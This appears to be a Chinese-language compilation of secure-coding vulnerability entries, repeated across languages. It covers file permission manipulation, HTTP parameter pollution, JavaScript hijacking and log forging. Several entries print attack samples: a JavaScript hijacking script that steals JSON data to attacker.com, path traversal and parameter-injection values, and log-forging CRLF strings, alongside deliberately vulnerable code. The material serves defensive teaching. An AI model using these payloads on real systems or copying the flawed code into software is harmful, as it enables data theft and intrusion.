當遇到下列狀況時會發生檔案權限操作錯誤：

1.攻擊者可指定在檔案系統上修改權限的操作中所使用的路徑。

2.攻擊者可指定檔案系統上的作業所指派的權限。

範例 1：下列程式碼使用來自系統環境變數的輸入設定檔案權限。如果攻擊者能夠修改系統環境變數，就能使用程式取得程式所操縱檔案的存取權。如果程式也存在 Path Manipulation 弱點，則攻擊者可能會使用這個弱點存取系統上的任意檔案。

    permissions := strconv.Atoi(os.Getenv("filePermissions"));
    fMode := os.FileMode(permissions)
    os.chmod(filePath, fMode);
    ...

當遇到下列狀況時會發生檔案權限操作錯誤：

1.攻擊者能夠指定在檔案系統上修改權限的作業中所使用的路徑。

2.攻擊者能夠指定檔案系統上的作業所指派的權限。

範例：以下程式碼旨在當使用者透過 FTP 上傳網頁時，設定適當的檔案權限。程式使用來自 HTTP 要求的輸入，以將檔案標示為外部使用者可檢視的狀態。

	$rName = $_GET['publicReport'];
	chmod("/home/". authenticateUser . "/public_html/" . rName,"0755");
...

然而，如果攻擊者提供一個惡意的值給 publicReport，如「../../localuser/public_html/.htpasswd」，應用程式會指定攻擊者可讀取那個檔案。

範例 2：以下程式碼使用組態設定檔案的輸入設定預設權限遮罩。如果攻擊者能修改組態設定檔案，就能使用程式取得程式所操縱檔案的存取權。如果程式也存在 Path Manipulation 弱點，則攻擊者可能會使用這個弱點存取系統上的任意檔案。

...
$mask = $CONFIG_TXT['perms'];
chmod($filename,$mask);
...

當遇到下列狀況時會發生檔案權限操作錯誤：

1. 攻擊者能夠指定在檔案系統上修改權限的作業中所使用的路徑。

2. 攻擊者能夠指定檔案系統上的作業所指派的權限。

範例 1： 下列程式碼使用來自系統環境變數的輸入設定檔案權限。 如果攻擊者能夠修改系統環境變數，就能使用程式取得程式所操縱檔案的存取權。 如果程式也存在 Path Manipulation 弱點，則攻擊者可能會使用這個弱點存取系統上的任意檔案。

    permissions = os.getenv("filePermissions");
    os.chmod(filePath, permissions);
    ...

當遇到下列狀況時會發生檔案權限操作錯誤：

1. 攻擊者能夠指定在檔案系統上修改權限的作業中所使用的路徑。

2. 攻擊者能夠指定檔案系統上的作業所指派的權限。

範例：以下程式碼旨在當使用者透過 FTP 上傳網頁時，設定適當的檔案權限。程式使用來自 HTTP 要求的輸入，以將檔案標示為外部使用者可檢視的狀態。

...
  rName = req['publicReport']
  File.chmod("/home/#{authenticatedUser}/public_html/#{rName}", "0755")
...

然而，如果攻擊者提供一個惡意的值給 publicReport，如「../../localuser/public_html/.htpasswd」，應用程式會指定攻擊者可讀取那個檔案。

範例 2：以下程式碼使用組態設定檔案的輸入設定預設權限遮罩。如果攻擊者可以更改組態設定檔案，就可能使用程式取得程式所操縱檔案的存取權。如果程式也存在 Path Manipulation 弱點，則攻擊者可能會使用這個弱點存取系統上的任意檔案。

...
mask = config_params['perms']
File.chmod(filename, mask)
...

HTTP Parameter Pollution (HPP)攻擊包含將編碼的字串限制字元注入其他現有參數。如果 Web 應用程式不能妥當清潔使用者輸入，惡意使用者可能危及應用程式邏輯，執行用戶端或伺服器端的攻擊。經由提交額外參數到網頁應用程式，且如果這些參數的名稱與現有參數相同，網頁應用程式可能以下列其中一種方式反應：

僅可使用第一個參數的資料
可使用最後一個參數的資料
可使用所有參數的資料，並將這些資料串連在一起


例如：
- ASP.NET/IIS 會使用所有出現的參數
- Apache Tomcat 僅使用第一個出現的參數並忽略其他位置出現的參數
- mod_perl/Apache 會將值轉換為一個值陣列

範例 1：根據應用程式伺服器及應用程式本身的邏輯而定，下列要求可能造成驗證系統的混淆，進而允許攻擊者模擬另一位使用者。
http://www.server.com/login.aspx?name=alice&name=hacker

範例 2：以下程式碼使用 HTTP 要求的輸入建立兩個超連結。

    ...
    String lang = Request.Form["lang"];
    WebClient client = new WebClient();
    client.BaseAddress = url;
    NameValueCollection myQueryStringCollection = new NameValueCollection();
    myQueryStringCollection.Add("q", lang);
    client.QueryString = myQueryStringCollection;
    Stream data = client.OpenRead(url);
    ...

URL: http://www.host.com/election.aspx?poll_id=4567
連結 1：<a href="http://www.host.com/vote.aspx?poll_id=4567&lang=en">英文<a>
連結 2：<a href="http://www.host.com/vote.aspx?poll_id=4567&lang=es">西班牙文<a>

程式設計師沒有考慮到攻擊者可能會提供 lang (例如 en&poll_id=1) 的可能性，然後該攻擊者可能會隨意變更 poll_id。

HTTP Parameter Pollution (HPP)攻擊包含將編碼的字串限制字元注入其他現有參數。如果 Web 應用程式不能妥當清潔使用者輸入，惡意使用者可能危及應用程式邏輯，執行用戶端或伺服器端的攻擊。經由提交額外參數到網頁應用程式，且如果這些參數的名稱與現有參數相同，網頁應用程式可能以下列其中一種方式反應：

僅可使用第一個參數的資料
可使用最後一個參數的資料
可使用所有參數的資料，並將這些資料串連在一起


例如：
- ASP.NET/IIS 會使用所有出現的參數
- Apache Tomcat 僅使用第一個出現的參數並忽略其他位置出現的參數
- mod_perl/Apache 會將值轉換為一個值陣列

範例 1：根據應用程式伺服器及應用程式本身的邏輯而定，下列要求可能造成驗證系統的混淆，進而允許攻擊者模擬另一位使用者。
http://www.server.com/login.php?name=alice&name=hacker

範例 2：以下程式碼使用 HTTP 要求的輸入建立兩個超連結。

    <%
        ...
        $id = $_GET["id"];
        header("Location: http://www.host.com/election.php?poll_id=" . $id);
        ...
    %>

URL： http://www.host.com/election.php?poll_id=4567
連結 1： <a href="vote.php?poll_id=4567&candidate=white">Vote for Mr. White<a>
連結 2： <a href="vote.php?poll_id=4567&candidate=green">Vote for Mrs. Green<a>

程式設計師尚未考慮到攻擊者可能會提供 poll_id，例如「4567&candidate=green」，然後結果頁面中將含有下列注入的連結，因此 Mrs. Green 將一直由選取第一個參數的應用程式伺服器進行投票。
<a href="vote.php?poll_id=4567&candidate=green&candidate=white">Vote for Mr. White<a>
<a href="vote.php?poll_id=4567&candidate=green&candidate=green">Vote for Mrs. Green<a>

HTTP Parameter Pollution (HPP)攻擊包含將編碼的字串限制字元注入其他現有參數。如果 Web 應用程式不能妥當清潔使用者輸入，惡意使用者可能危及應用程式邏輯，執行用戶端或伺服器端的攻擊。經由提交額外參數到網頁應用程式，且如果這些參數的名稱與現有參數相同，網頁應用程式可能以下列其中一種方式反應：

僅可使用第一個參數的資料。
可使用最後一個參數的資料。
可使用所有參數的資料，並將這些資料串連在一起。


例如：
- ASP.NET/IIS 會使用所有出現的參數
- Apache Tomcat 僅使用第一個出現的參數並忽略其他位置出現的參數
- mod_perl/Apache 會將值轉換為一個值陣列

範例 1：根據應用程式伺服器及應用程式本身的邏輯而定，下列要求可能造成驗證系統的混淆，進而允許攻擊者模擬另一位使用者。
http://www.server.com/login.php?name=alice&name=hacker

如此所示，攻擊者已指定 name=alice，但已新增其他 name=alice&，如果在第一次使用它們的伺服器上使用，則會模擬 alice 以便取得其帳戶的進一步資訊。

允許鍵盤延伸讀取使用者輸入的每個單一按鍵輸入。通常使用第三方鍵盤來簡化文字輸入或新增其他 Emoji，它們可能會記錄使用者輸入的內容，甚至將其傳送至遠端伺服器進行處理。還可能會散佈惡意鍵盤作為鍵盤記錄木馬程式，讀取使用者輸入的每個金鑰值，以竊取諸如憑證或信用卡號等敏感資料。

在下列情況下，應用程式可能很容易受到 JavaScript 劫持的攻擊：1) 使用 JavaScript 物件做為資料傳輸格式，2) 處理機密資料。由於 JavaScript 劫持弱點不會做為編碼錯誤的直接結果出現，因此 Fortify Secure Coding Rulepacks 會透過識別在 HTTP 回應中可能產生 JavaScript 的程式碼，喚起人們對潛在 JavaScript 劫持弱點的注意。

網頁瀏覽器強制使用相同來源原則 (Same Origin Policy) 來保護使用者免受惡意網站的攻擊。相同來源策略 (Same Origin Policy) 要求，若要使用 JavaScript 存取網頁的內容，則 JavaScript 和網頁都必須來自相同的網域。若不使用相同來源策略 (Same Origin Policy)，惡意的網站可使用用戶端的憑證來執行 JavaScript，從其他網站載入敏感的資訊，從中挑選出資訊並將資訊回傳給攻擊者。JavaScript 劫持的攻擊將允許攻擊者略過相同來源策略 (Same Origin Policy)，在 Web 應用程式使用 JavaScript 來傳遞機密資訊。相同來源策略 (Same Origin Policy) 的弱點就是它允許任何網站的 JavaScript 都可被任何其他網站的上下文環境包含或執行。即使惡意的網站不能直接在用戶端上檢查來自於易受攻擊的網站載入的任何資料，但是它仍然可以設定環境來利用此弱點，此環境允許它去監視 JavaScript 的執行過程和任何相關的負面影響。很多的網路 2.0 應用程式將 JavaScript 當做資料傳輸機制使用，與傳統的 Web 應用程式不同，它們很容易受到攻擊。

在 JavaScript 中最常見的資訊傳輸的格式為 JavaScript Object Notation (JSON)。JSON RFC 將 JSON 語法定義為 JavaScript 物件文字語法(object literal syntax)的子集。JSON 基於兩種類型的資料結構：陣列和物件。任何可將訊息解譯成一個或多個有效的 JavaScript 指令的資料傳輸格式，都極易受到 JavaScript 劫持的攻擊。JSON 使 JavaScript 劫持攻擊變得更容易，因為 JSON 陣列堅持認為它自己是一個有效的 JavaScript 指令。因為陣列是傳輸清單的一種正常形式，當應用程式需要傳輸多個值時一般會使用該形式。換句話說，JSON 陣列會直接受到 JavaScript 劫持的攻擊。JSON 物件只在它被一些其他 JavaScript 結構包圍時才會受到攻擊，這些 JavaScript 結構堅持它們自己是有效的 JavaScript 指令。

範例 1：以下範例首先顯示 Web 應用程式的用戶端與伺服器元件之間的合法 JSON 互動，此 Web 應用程式用於管理銷售機會。範例進一步說明攻擊者是如何模擬用戶端並取得伺服器傳回的機密資料的存取權。請注意，本範例是以 Mozilla 為基礎的瀏覽器來撰寫的。在建立物件時，若沒有使用新的運算子，其他主流的瀏覽器將不允許替換原始的構造函數。

用戶端要求來自伺服器的資料，並使用以下的程式碼來評估 JSON 結果：

var object;
var req = new XMLHttpRequest();
req.open("GET", "/object.json",true);
req.onreadystatechange = function () {
  if (req.readyState == 4) {
    var txt = req.responseText;
    object = eval("(" + txt + ")");
    req = null;
  }
};
req.send(null);

當此程式碼執行時，將產生如下的 HTTP 要求：

GET /object.json HTTP/1.1
...
Host: www.example.com
Cookie: JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZTr4a5YJaSbAiTnRR

(在此 HTTP 回應和之後的內容，我們省略了與此說明沒有直接關係的 HTTP 表頭。)
伺服器使用 JSON 格式的陣列進行回應：

HTTP/1.1 200 OK
Cache-control: private
Content-Type: text/JavaScript; charset=utf-8
...
[{"fname":"Brian", "lname":"Chess", "phone":"6502135600",
  "purchases":60000.00, "email":"brian@example.com" },
 {"fname":"Katrina", "lname":"O'Neil", "phone":"6502135600",
  "purchases":120000.00, "email":"katrina@example.com" },
 {"fname":"Jacob", "lname":"West", "phone":"6502135600",
  "purchases":45000.00, "email":"jacob@example.com" }]

在此案例中，JSON 包含了與目前使用者相關的機密資訊 (一組銷售機會清單)。其他使用者如果不知道使用者的階段作業識別碼，是無法存取這些資訊的。(在大部份的現代 Web 應用程式中，階段作業識別碼儲存在 cookie 中。)不過，如果一位受害者造訪了惡意的網站，此惡意網站可以使用 JavaScript 劫持來擷取資訊。如果受害者受騙而造訪了包含下列惡意程式碼的網頁，則將會把受害者的重要資訊傳送到攻擊者的網站中。

<script>
// override the constructor used to create all objects so
// that whenever the "email" field is set, the method
// captureObject() will run. Since "email" is the final field,
// this will allow us to steal the whole object.
function Object() {
 this.email setter = captureObject;
}

// Send the captured object back to the attacker's web site
function captureObject(x) {
  var objString = "";
  for (fld in this) {
    objString += fld + ": " + this[fld] + ", ";
  }
  objString += "email: " + x;
  var req = new XMLHttpRequest();
  req.open("GET", "http://attacker.com?obj=" +
           escape(objString),true);
  req.send(null);
}
</script>

<!-- Use a script tag to bring in victim's data -->
<script src="http://www.example.com/object.json"></script>

惡意程式碼使用 Script 標籤將 JSON 物件包括在目前頁面中。網路瀏覽器會隨要求傳送相應的階段作業 cookie。換言之，系統將會處理此要求，就像其來自合法應用程式一樣。

JSON 陣列到達用戶端時，將在惡意頁面的環境內接受評估。為了監視 JSON 的評估，惡意頁面已重新定義用於建立新物件的 JavaScript 函數。透過此方式，惡意程式碼已插入陷阱，藉此取得建立每個物件以及將物件的內容傳回惡意網站的存取權。其他攻擊可能會改為取代陣列的預設建構函式。為了在 mashup 中使用而建立的應用程式有時會在每則 JavaScript 訊息的末尾呼叫收回函數。收回函數原本由 mashup 中的其他應用程式定義。收回函數讓 JavaScript 劫持攻擊成為常事，所有攻擊者只需定義函數即可。應用程式可為 mashup 提供方便，也可以保持安全，但兩者不可兼得。若使用者未登入易受攻擊的網站，攻擊者可能請求使用者登入，然後顯示應用程式的合法登入頁面，藉此進行彌補。

這並非網路釣魚攻擊，因為攻擊者並未取得使用者憑證的存取權，因此防網路釣魚的應對舉措無法防禦此攻擊。更複雜的攻擊可能會使用 JavaScript 動態產生 Script 標籤，從而對應用程式產生一系列要求。這一相同技術有時也用於建立應用程式 mashup。唯一的不同之處在於，在此 mashup 情況中，涉及的其中一個應用程式是惡意的。

JSONP 在設計上，會允許執行跨網域要求，但缺乏限制和驗證要求來源的任何機制。 惡意網站可代表使用者輕易執行 JSONP 要求並處理 JSON 回應。 基於這個原因，極力建議您在傳送 PII 或敏感資料時，避免使用此通訊技術。

Microsoft AJAX.NET (Atlas) 使用 JSON 在伺服器和用戶端之間傳輸資料。此框架產生包含使用 <script> 標籤評估的有效 JavaScript 的回應，因此容易受到 JavaScript 劫持的攻擊 [1]。預設情況下，此框架使用 POST 方法傳遞要求，這使得從惡意的 <script> 標籤產生要求變得困難 (因為 <script> 標籤只會產生 GET 要求)。儘管如此，Microsoft AJAX.NET 確實提供了使用 GET 要求的機制。事實上，許多專家鼓勵程式設計師使用 GET 要求，以執行瀏覽器快取以及增進效能。

在下列情況下，應用程式可能很容易受到 JavaScript 劫持的攻擊：1) 使用 JavaScript 物件做為資料傳輸格式，2) 處理機密資料。由於 JavaScript 劫持弱點不會做為編碼錯誤的直接結果出現，因此 Fortify Secure Coding Rulepacks 會透過識別在 HTTP 回應中可能產生 JavaScript 的程式碼，喚起人們對潛在 JavaScript 劫持弱點的注意。

網頁瀏覽器強制使用相同來源策略 (Same Origin Policy) 來保護使用者免受惡意網站的攻擊。相同來源策略 (Same Origin Policy) 要求，若要使用 JavaScript 存取網頁的內容，則 JavaScript 和網頁都必須來自相同的網域。若不使用相同來源策略 (Same Origin Policy)，惡意的網站可使用用戶端的憑證來執行 JavaScript，從其他網站載入敏感的資訊，從中挑選出資訊並將資訊回傳給攻擊者。JavaScript 劫持的攻擊將允許攻擊者略過相同來源策略 (Same Origin Policy)，在 Web 應用程式使用 JavaScript 來傳遞機密資訊。相同來源策略 (Same Origin Policy) 的弱點就是它允許任何網站的 JavaScript 都可被任何其他網站的上下文環境包含或執行。即使惡意的網站不能直接在用戶端上檢查來自於易受攻擊的網站載入的任何資料，但是它仍然可以設定環境來利用此弱點，此環境允許它去監視 JavaScript 的執行過程和任何相關的負面影響。很多的網路 2.0 應用程式將 JavaScript 當做資料傳輸機制使用，與傳統的 Web 應用程式不同，它們很容易受到攻擊。

在 JavaScript 中最常見的資訊傳輸的格式為 JavaScript Object Notation (JSON)。JSON RFC 將 JSON 語法定義為 JavaScript 物件文字語法(object literal syntax)的子集。JSON 基於兩種類型的資料結構：陣列和物件。任何可將訊息解譯成一個或多個有效的 JavaScript 指令的資料傳輸格式，都極易受到 JavaScript 劫持的攻擊。JSON 使 JavaScript 劫持攻擊變得更容易，因為 JSON 陣列堅持認為它自己是一個有效的 JavaScript 指令。因為陣列是傳輸清單的一種正常形式，當應用程式需要傳輸多個值時一般會使用該形式。換句話說，JSON 陣列會直接受到 JavaScript 劫持的攻擊。JSON 物件只在它被一些其他 JavaScript 結構包圍時才會受到攻擊，這些 JavaScript 結構堅持它們自己是有效的 JavaScript 指令。

範例 1：以下範例首先顯示 Web 應用程式的用戶端與伺服器元件之間的合法 JSON 互動，此 Web 應用程式用於管理銷售機會。範例進一步說明攻擊者是如何模擬用戶端並取得伺服器傳回的機密資料的存取權。請注意，本範例是以 Mozilla 為基礎的瀏覽器來撰寫的。在建立物件時，若沒有使用新的運算子，其他主流的瀏覽器將不允許替換原始的構造函數。

用戶端要求來自伺服器的資料，並使用以下的程式碼來評估 JSON 結果：

var object;
var req = new XMLHttpRequest();
req.open("GET", "/object.json",true);
req.onreadystatechange = function () {
  if (req.readyState == 4) {
    var txt = req.responseText;
    object = eval("(" + txt + ")");
    req = null;
  }
};
req.send(null);

當此程式碼執行時，將產生如下的 HTTP 要求：

GET /object.json HTTP/1.1
...
Host: www.example.com
Cookie: JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZTr4a5YJaSbAiTnRR

(在此 HTTP 回應和之後的內容，我們省略了與此說明沒有直接關係的 HTTP 表頭。)
伺服器使用 JSON 格式的陣列進行回應：

HTTP/1.1 200 OK
Cache-control: private
Content-Type: text/javascript; charset=utf-8
...
[{"fname":"Brian", "lname":"Chess", "phone":"6502135600",
  "purchases":60000.00, "email":"brian@example.com" },
 {"fname":"Katrina", "lname":"O'Neil", "phone":"6502135600",
  "purchases":120000.00, "email":"katrina@example.com" },
 {"fname":"Jacob", "lname":"West", "phone":"6502135600",
  "purchases":45000.00, "email":"jacob@example.com" }]

在此案例中，JSON 包含了與目前使用者相關的機密資訊 (一組銷售機會清單)。其他使用者如果不知道使用者的階段作業識別碼，是無法存取這些資訊的。(在大部份的現代 Web 應用程式中，階段作業識別碼儲存在 cookie 中。)不過，如果一位受害者造訪了惡意的網站，此惡意網站可以使用 JavaScript 劫持來擷取資訊。如果受害者受騙而造訪了包含下列惡意程式碼的網頁，則將會把受害者的重要資訊傳送到攻擊者的網站中。

<script>
// override the constructor used to create all objects so
// that whenever the "email" field is set, the method
// captureObject() will run. Since "email" is the final field,
// this will allow us to steal the whole object.
function Object() {
 this.email setter = captureObject;
}

// Send the captured object back to the attacker's Web site
function captureObject(x) {
  var objString = "";
  for (fld in this) {
    objString += fld + ": " + this[fld] + ", ";
  }
  objString += "email: " + x;
  var req = new XMLHttpRequest();
  req.open("GET", "http://attacker.com?obj=" +
           escape(objString),true);
  req.send(null);
}
</script>

<!-- Use a script tag to bring in victim's data -->
<script src="http://www.example.com/object.json"></script>

惡意程式碼使用 Script 標籤將 JSON 物件包括在目前頁面中。網路瀏覽器會隨要求傳送相應的階段作業 cookie。換言之，系統將會處理此要求，就像其來自合法應用程式一樣。

JSON 陣列到達用戶端時，將在惡意頁面的環境內接受評估。為了監視 JSON 的評估，惡意頁面已重新定義用於建立新物件的 JavaScript 函數。透過此方式，惡意程式碼已插入陷阱，藉此取得建立每個物件以及將物件的內容傳回惡意網站的存取權。其他攻擊可能會改為取代陣列的預設建構函式。為了在 mashup 中使用而建立的應用程式有時會在每則 JavaScript 訊息的末尾呼叫收回函數。收回函數原本由 mashup 中的其他應用程式定義。收回函數讓 JavaScript 劫持攻擊成為常事，所有攻擊者只需定義函數即可。應用程式可為 mashup 提供方便，也可以保持安全，但兩者不可兼得。若使用者未登入易受攻擊的網站，攻擊者可能請求使用者登入，然後顯示應用程式的合法登入頁面，藉此進行彌補。

這並非網路釣魚攻擊，因為攻擊者並未取得使用者憑證的存取權，因此防網路釣魚的應對舉措無法防禦此攻擊。更複雜的攻擊可能會使用 JavaScript 動態產生 Script 標籤，從而對應用程式產生一系列要求。這一相同技術有時也用於建立應用程式 mashup。唯一的不同之處在於，在此 mashup 情況中，涉及的其中一個應用程式是惡意的。

在下列情況下，應用程式可能很容易受到 JavaScript 劫持的攻擊：1) 使用 JavaScript 物件做為資料傳輸格式，2) 處理機密資料。由於 JavaScript 劫持弱點不會做為編碼錯誤的直接結果出現，因此 Fortify Secure Coding Rulepacks 會透過識別在 HTTP 回應中可能產生 JavaScript 的程式碼，喚起人們對潛在 JavaScript 劫持弱點的注意。

網頁瀏覽器強制使用相同來源原則 (Same Origin Policy) 來保護使用者免受惡意網站的攻擊。相同來源策略 (Same Origin Policy) 要求，若要使用 JavaScript 存取網頁的內容，則 JavaScript 和網頁都必須來自相同的網域。若不使用相同來源策略 (Same Origin Policy)，惡意的網站可使用用戶端的憑證來執行 JavaScript，從其他網站載入敏感的資訊，從中挑選出資訊並將資訊回傳給攻擊者。JavaScript 劫持的攻擊將允許攻擊者略過相同來源策略 (Same Origin Policy)，在 Web 應用程式使用 JavaScript 來傳遞機密資訊。相同來源策略 (Same Origin Policy) 的弱點就是它允許任何網站的 JavaScript 都可被任何其他網站的上下文環境包含或執行。即使惡意的網站不能直接在用戶端上檢查來自於易受攻擊的網站載入的任何資料，但是它仍然可以設定環境來利用此弱點，此環境允許它去監視 JavaScript 的執行過程和任何相關的負面影響。很多的網路 2.0 應用程式將 JavaScript 當做資料傳輸機制使用，與傳統的 Web 應用程式不同，它們很容易受到攻擊。

在 JavaScript 中最常見的資訊傳輸的格式為 JavaScript Object Notation (JSON)。JSON RFC 將 JSON 語法定義為 JavaScript 物件文字語法(object literal syntax)的子集。JSON 基於兩種類型的資料結構：陣列和物件。任何可將訊息解譯成一個或多個有效的 JavaScript 指令的資料傳輸格式，都極易受到 JavaScript 劫持的攻擊。JSON 使 JavaScript 劫持攻擊變得更容易，因為 JSON 陣列堅持認為它自己是一個有效的 JavaScript 指令。因為陣列是傳輸清單的一種正常形式，當應用程式需要傳輸多個值時一般會使用該形式。換句話說，JSON 陣列會直接受到 JavaScript 劫持的攻擊。JSON 物件只在它被一些其他 JavaScript 結構包圍時才會受到攻擊，這些 JavaScript 結構堅持它們自己是有效的 JavaScript 指令。

範例 1：以下範例首先顯示 Web 應用程式的用戶端與伺服器元件之間的合法 JSON 互動，此 Web 應用程式用於管理銷售機會。範例進一步說明攻擊者是如何模擬用戶端並取得伺服器傳回的機密資料的存取權。請注意，本範例是以 Mozilla 為基礎的瀏覽器來撰寫的。在建立物件時，若沒有使用新的運算子，其他主流的瀏覽器將不允許替換原始的構造函數。

用戶端要求來自伺服器的資料，並使用以下的程式碼來評估 JSON 結果：

var object;
var req = new XMLHttpRequest();
req.open("GET", "/object.json",true);
req.onreadystatechange = function () {
  if (req.readyState == 4) {
    var txt = req.responseText;
    object = eval("(" + txt + ")");
    req = null;
  }
};
req.send(null);

當此程式碼執行時，將產生如下的 HTTP 要求：

GET /object.json HTTP/1.1
...
Host: www.example.com
Cookie: JSESSIONID=F2rN6HopNzsfXFjHX1c5Ozxi0J5SQZTr4a5YJaSbAiTnRR

(在此 HTTP 回應和之後的內容，我們省略了與此說明沒有直接關係的 HTTP 表頭。)
伺服器使用 JSON 格式的陣列進行回應：

HTTP/1.1 200 OK
Cache-control: private
Content-Type: text/JavaScript; charset=utf-8
...
[{"fname":"Brian", "lname":"Chess", "phone":"6502135600",
  "purchases":60000.00, "email":"brian@example.com" },
 {"fname":"Katrina", "lname":"O'Neil", "phone":"6502135600",
  "purchases":120000.00, "email":"katrina@example.com" },
 {"fname":"Jacob", "lname":"West", "phone":"6502135600",
  "purchases":45000.00, "email":"jacob@example.com" }]

在此案例中，JSON 包含了與目前使用者相關的機密資訊 (一組銷售機會清單)。其他使用者如果不知道使用者的階段作業識別碼，是無法存取這些資訊的。(在大部份的現代 Web 應用程式中，階段作業識別碼儲存在 cookie 中。)不過，如果一位受害者造訪了惡意的網站，此惡意網站可以使用 JavaScript 劫持來擷取資訊。如果受害者受騙而造訪了包含下列惡意程式碼的網頁，則將會把受害者的重要資訊傳送到攻擊者的網站中。

<script>
// override the constructor used to create all objects so
// that whenever the "email" field is set, the method
// captureObject() will run. Since "email" is the final field,
// this will allow us to steal the whole object.
function Object() {
 this.email setter = captureObject;
}

// Send the captured object back to the attacker's web site
function captureObject(x) {
  var objString = "";
  for (fld in this) {
    objString += fld + ": " + this[fld] + ", ";
  }
  objString += "email: " + x;
  var req = new XMLHttpRequest();
  req.open("GET", "http://attacker.com?obj=" +
           escape(objString),true);
  req.send(null);
}
</script>

<!-- Use a script tag to bring in victim's data -->
<script src="http://www.example.com/object.json"></script>

惡意程式碼使用 Script 標籤將 JSON 物件包括在目前頁面中。網路瀏覽器會隨要求傳送相應的階段作業 cookie。換言之，系統將會處理此要求，就像其來自合法應用程式一樣。

JSON 陣列到達用戶端時，將在惡意頁面的環境內接受評估。為了監視 JSON 的評估，惡意頁面已重新定義用於建立新物件的 JavaScript 函數。透過此方式，惡意程式碼已插入陷阱，藉此取得建立每個物件以及將物件的內容傳回惡意網站的存取權。其他攻擊可能會改為取代陣列的預設建構函式。為了在 mashup 中使用而建立的應用程式有時會在每則 JavaScript 訊息的末尾呼叫收回函數。收回函數原本由 mashup 中的其他應用程式定義。收回函數讓 JavaScript 劫持攻擊成為常事，所有攻擊者只需定義函數即可。應用程式可為 mashup 提供方便，也可以保持安全，但兩者不可兼得。若使用者未登入易受攻擊的網站，攻擊者可能請求使用者登入，然後顯示應用程式的合法登入頁面，藉此進行彌補。

這並非網路釣魚攻擊，因為攻擊者並未取得使用者憑證的存取權，因此防網路釣魚的應對舉措無法防禦此攻擊。更複雜的攻擊可能會使用 JavaScript 動態產生 Script 標籤，從而對應用程式產生一系列要求。這一相同技術有時也用於建立應用程式 mashup。唯一的不同之處在於，在此 mashup 情況中，涉及的其中一個應用程式是惡意的。

Log Forging 弱點會在以下情況中出現：

1. 資料從不可信賴的來源進入應用程式。

2. 將資料寫入應用程式或系統記錄檔。

一般來說，應用程式會使用記錄檔來儲存事件或交易的歷史記錄，以便之後進行檢閱、統計資料蒐集或除錯之用。根據應用程式的本質而定，檢閱日誌檔的工作可在需要時手動執行，或者自動執行，方法為使用工具自動選取重要事件或帶有某種傾向資訊的記錄檔。

如果攻擊者可以提供資料給會持續逐字記錄內容的應用程式，則可能會妨礙或是誤導記錄檔的解讀。在大多數理想的情況下，攻擊者可能會藉由提供應用程式包含適當字元的輸入，而將錯誤的項目插入記錄檔。如果記錄檔是自動化處理的，那麼攻擊者就可能能夠藉由破壞檔案格式或插入預期外字元的方式，來使檔案無法使用。更猛烈的惡意攻擊甚至可能導致記錄檔的統計資料產生偏差。藉由偽造或其他方式，毀損的記錄檔可用來掩護攻擊者的追蹤，或甚至授意第三方執行惡意行為 [1]。最糟糕的情況是，攻擊者可能會在記錄檔中插入程式碼或其他指令，並利用記錄檔理公用程式的弱點進行破壞 [2]。

範例：以下 Web 應用程式程式碼嘗試從一個要求物件中讀取數值。然後記錄此數值。

...
DATA log_msg TYPE bal_s_msg.

val = request->get_form_field( 'val' ).

log_msg-msgid = 'XY'.
log_msg-msgty = 'E'.
log_msg-msgno = '123'.
log_msg-msgv1 = 'VAL: '.
log_msg-msgv2 = val.

CALL FUNCTION 'BAL_LOG_MSG_ADD'
  EXPORTING
    I_S_MSG          = log_msg
  EXCEPTIONS
    LOG_NOT_FOUND    = 1
    MSG_INCONSISTENT = 2
    LOG_IS_FULL      = 3
    OTHERS           = 4.
...

如果使用者提交用於 val 的字串「FOO」，則會記錄以下項目：

XY E 123 VAL: FOO

不過，如果攻擊者傳遞了字串「FOO XY E 124 VAL: BAR」，則會記錄以下的項目：

XY E 123 VAL: FOO XY E 124 VAL: BAR

您可以清楚發現，攻擊者可能使用相同的機制來插入任何記錄檔項目。

Log Forging 弱點會在以下情況中出現：

1. 資料從不可信賴的來源進入應用程式。

2. 將資料寫入應用程式或系統記錄檔。

一般來說，應用程式會使用記錄檔來儲存事件或交易的歷史記錄，以便之後進行檢閱、統計資料蒐集或除錯之用。根據應用程式的本質而定，檢閱日誌檔的工作可在需要時手動執行，或者自動執行，方法為使用工具自動選取重要事件或帶有某種傾向資訊的記錄檔。

如果攻擊者可以提供資料給會持續逐字記錄內容的應用程式，則可能會妨礙或是誤導記錄檔的解讀。在大多數理想的情況下，攻擊者可能會藉由提供應用程式包含適當字元的輸入，而將錯誤的項目插入記錄檔。如果記錄檔是自動化處理的，那麼攻擊者就可能能夠藉由破壞檔案格式或插入預期外字元的方式，來使檔案無法使用。更猛烈的惡意攻擊甚至可能導致記錄檔的統計資料產生偏差。藉由偽造或其他方式，毀損的記錄檔可用來掩護攻擊者的追蹤，或甚至授意第三方執行惡意行為 [1]。最糟糕的情況是，攻擊者可能會在記錄檔中插入程式碼或其他指令，並利用記錄檔理公用程式的弱點進行破壞 [2]。

範例：以下 Web 應用程式程式碼嘗試從一個要求物件中讀取整數值。如果這個值無法解析成一個整數，那麼就會記錄此輸入並附帶一個錯誤訊息，說明發生哪些情況。

var params:Object = LoaderInfo(this.root.loaderInfo).parameters;
var val:String = String(params["username"]);
var value:Number = parseInt(val);
if (value == Number.NaN) {
  trace("Failed to parse val = " + val);
}

如果使用者提交用於 val 的字串「twenty-one」，則會記錄以下項目：

Failed to parse val=twenty-one

不過，如果攻擊者傳遞了字串「twenty-one%0a%0aINFO:+User+logged+out%3dbadguy」，則會記錄以下的項目：

Failed to parse val=twenty-one

User logged out=badguy

您可以清楚發現，攻擊者可能使用相同的機制來插入任何記錄檔項目。

Log Forging 弱點會在以下情況中出現：

1.資料從不可信賴的來源進入應用程式。

2.資料寫入至應用程式或是系統記錄檔中。

一般來說，應用程式會使用記錄檔來儲存事件或交易的歷史記錄，以便之後進行檢閱、統計資料蒐集或除錯之用。根據應用程式的本質而定，檢閱日誌檔的工作可在需要時手動執行，或者自動執行，方法為使用工具自動選取重要事件或帶有某種傾向資訊的記錄檔。

